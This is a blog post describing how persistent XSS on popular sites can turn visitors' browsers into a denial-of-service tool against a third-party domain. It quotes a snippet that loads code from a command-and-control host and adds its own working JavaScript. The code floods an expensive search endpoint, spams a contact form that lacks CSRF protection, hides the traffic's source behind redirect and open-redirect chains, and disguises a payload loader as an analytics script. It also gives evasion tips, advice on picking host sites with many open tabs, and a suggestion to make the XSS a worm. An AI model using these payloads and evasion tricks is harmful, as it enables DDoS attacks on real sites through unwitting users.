More Advanced XSS Denial of Service Attacks?
After reading Incapsula's blog post about how an "Alexa Top 50" website suffered a persistent XSS vulnerability that hacker(s) used to attack a victim domain, it got me thinking. The attack simply performed an XMLHttpRequest to the victim domain in a continuous loop, flooding the target with rogue GET requests.
The snippet provided by Incapsula:
```
// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
    $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>");
}

// Ajax DDoS tool executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url, url2) {
    window.setInterval(function () {
        $.getScript(url);
        $.getScript(url2);
    }, 1000);
}
</script>
</body></html>
```
This attack seemed very simple and was perhaps just a test run of the technique.
Clever: the attacker uses an XSS vulnerability in a popular site to make uninfected visitors attack a target domain. No need for dirty exploit packs or for keeping malware under detection from AV! That said, a simple patch from the vulnerable site could stop this exploit pretty quickly.
Better XSS DoS Attack?
So our biggest fears as a hacker would be:
- The vulnerable site figuring out our madness and patching the hole
- The victim site figuring out where the attack originated from and contacting the vulnerable site about it
- The victim site being able to filter out these malicious requests
- Not causing enough damage with the flood of requests coming in (think more bang for your request!)
- Not finding a vulnerable site with lots of traffic and persistent viewers
Here are a few tricks that a hacker could use to make this type of attack even stronger and more stealthy.
Request the Most Resource Intensive Page
Every request counts – a hacker should ensure that his flood of requests isn't going to waste. Choosing a page that causes the most backend work per request is an important part of the attack.
For example a request for:
http://victim.com/index.php
Wouldn’t be as resource intensive as:
http://victim.com/search.php?query=e&category=all&results=100
The second URL would cause considerably more work on the victim's server. Searching for the letter "e" across the entire database is a pretty expensive operation!
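To make that concrete, here's a minimal sketch of what the injected loop might look like when pointed at an expensive endpoint (the URL, interval, and cache-busting parameter are all illustrative, not taken from the original attack):

```javascript
// Minimal sketch (hypothetical URL): hammer the victim's most expensive
// endpoint instead of a static file. A random cache-busting parameter
// forces the backend to do real work on every hit instead of serving
// the response from a cache.
var target = 'http://victim.com/search.php?query=e&category=all&results=100';
window.setInterval(function () {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', target + '&cachebust=' + Math.random(), true);
    xhr.send();
}, 1000);
```

Note that even though a cross-origin page can't read the response, the browser still sends the request, which is all the attacker cares about.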
Even worse if a site had a page such as:
http://victim.com/email_us.php
Without any sort of CSRF token protection, chaining the vulnerabilities together could cause one hell of a headache! A bunch of XMLHttpRequests hammering an email contact form could end very badly indeed.
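As a rough sketch, assuming a hypothetical contact form behind email_us.php with no CSRF token (the field names below are made up), the same loop could submit the form itself:

```javascript
// Hypothetical sketch: repeatedly submit an unprotected contact form.
// Each request now triggers an outbound email on top of the page hit,
// so every "visitor" does far more damage per request.
window.setInterval(function () {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'http://victim.com/email_us.php', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    // Field names are assumptions for illustration only
    xhr.send('name=John&email=john%40example.com&message=Hello');
}, 1000);
```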
The possibilities are practically endless, especially when you start chaining together other "low risk" vulnerabilities.
Hide the Source with Link Shorteners and Open Redirect Chaining
Hiding the source of the attack is probably a good idea as well; if the victim site sees lots of "Referer" headers pointing to "hacker-site.pw" or "vulnerable-site.com", they may investigate.
A better route would probably look more like the following:

[ Vulnerable Site XSS ] -> Hacker Site With Redirect -> Link Shortener -> Victim Site Search Query
That seems like a pretty long chain, but it has the advantage that the Referer comes out as a link shortener service rather than the hacker's site or the vulnerable site. It also allows flexibility to swap out link shortening services if a link is marked as bad or deleted.
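The hacker's hop in that chain could be nothing more than a trivial redirect page; a sketch, with a made-up shortened URL that would ultimately resolve to the victim's search query:

```javascript
// Hypothetical redirect page script hosted on the hacker's site. The
// shortened URL below is illustrative; it would resolve (eventually) to
// the victim's expensive search query, so traffic appears to flow
// through the shortener service rather than this domain.
window.location.replace('http://short.example/a1b2c3');
```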
What about chaining another vulnerability to make things better? What if our victim site was itself vulnerable to an open redirect?

[ Vulnerable Site XSS ] -> Hacker Site With Redirect -> Victim Site Open Redirect Page -> Victim Site Search Query

Now the victim site is gonna have a bit of an issue filtering this traffic, since it's coming from a page of their own! Alternatively, the last hop could be some random site with an open redirect vulnerability:

[ Vulnerable Site XSS ] -> Hacker Site With Redirect -> Random Site Open Redirect Page -> Victim Site Search Query

Either way, the chain removes the risk of being flagged by a URL shortener service, and the work of fixing the open redirect page lands on whoever hosts it.
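For illustration, assuming a hypothetical open redirect page at redirect.php that passes a url parameter through unchecked, the final hop could be built like this:

```javascript
// Hypothetical open redirect hop (the page and parameter name are
// assumptions). The redirect page forwards the browser straight on to
// the expensive search query, so the last hop in the chain is now one
// of the victim's own pages (or a random third-party site's page).
var expensive = 'http://victim.com/search.php?query=e&category=all&results=100';
window.location.replace(
    'http://victim.com/redirect.php?url=' + encodeURIComponent(expensive)
);
```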
If the hacker wanted to be extra clever he could simply make his domain appear to be an ad server or some sort of analytics service. For example, a background HTTP request to a site like "burst-analytics.com" looks a lot more legitimate than one to "viagra-free-sample.ru" or "03495ja.info". Done cleverly, the attack could be performed for a reasonable period without detection by any of the users unwittingly carrying it out.
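For example, the injected payload could be dressed up as a boring analytics tag (using the made-up "burst-analytics.com" domain from above):

```javascript
// A payload disguised as routine tracking code. To anyone glancing at
// the page source or network tab, this looks like an ordinary analytics
// include; in reality the script it loads runs the request flood.
var s = document.createElement('script');
s.src = 'http://burst-analytics.com/tracker.js'; // hypothetical payload host
document.body.appendChild(s);
```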
Finding a Good Vulnerable Site
Finally, having the right kind of vulnerable site is an important factor. As pointed out by Incapsula, video sites are an effective target because viewers spend a long time on a page watching a video to completion. That makes them a perfect host: the longer the page stays open, the longer the attack goes on.
Even better, what if it was a site that people usually keep multiple tabs open for? Videos are cool, but having 20 tabs open (like seemingly every Chrome user in existence) makes for a far stronger attack.
Sites like Reddit, Digg, and other link sharing services are a good choice for these types of attacks. It also goes without saying that porn sites are *ahem* a good option, due to the fact that users often open lots of tabs on the same site. Not that I'm judging.
Even better are apps like Spotify and other desktop clients that are basically watered-down web views and can sit in your dock idling forever. If you had an XSS attack running on one of those services it could continue 24/7 uninterrupted.
If you really wanna get crazy, make the XSS a worm and spread it across even more of the site. See the post about self-propagating JavaScript worms that I wrote a while ago.
Conclusion
Overall, these types of attacks are bound to happen again, as they are simple and effective when done in a clever way. If chained with a lack of CSRF tokens or an open redirect vulnerability, things could get much more powerful and complex. They also have a big advantage in that they don't require any sort of infection on a victim's computer, just some rogue JS on a vulnerable site.
It really makes you think: should these large sites be held responsible for vulnerabilities that allow attacks like this to happen? A good comparison would be DNS amplification attacks, which allow DoS attacks to be amplified through the use of vulnerable DNS servers.
Until next time,
-mandatory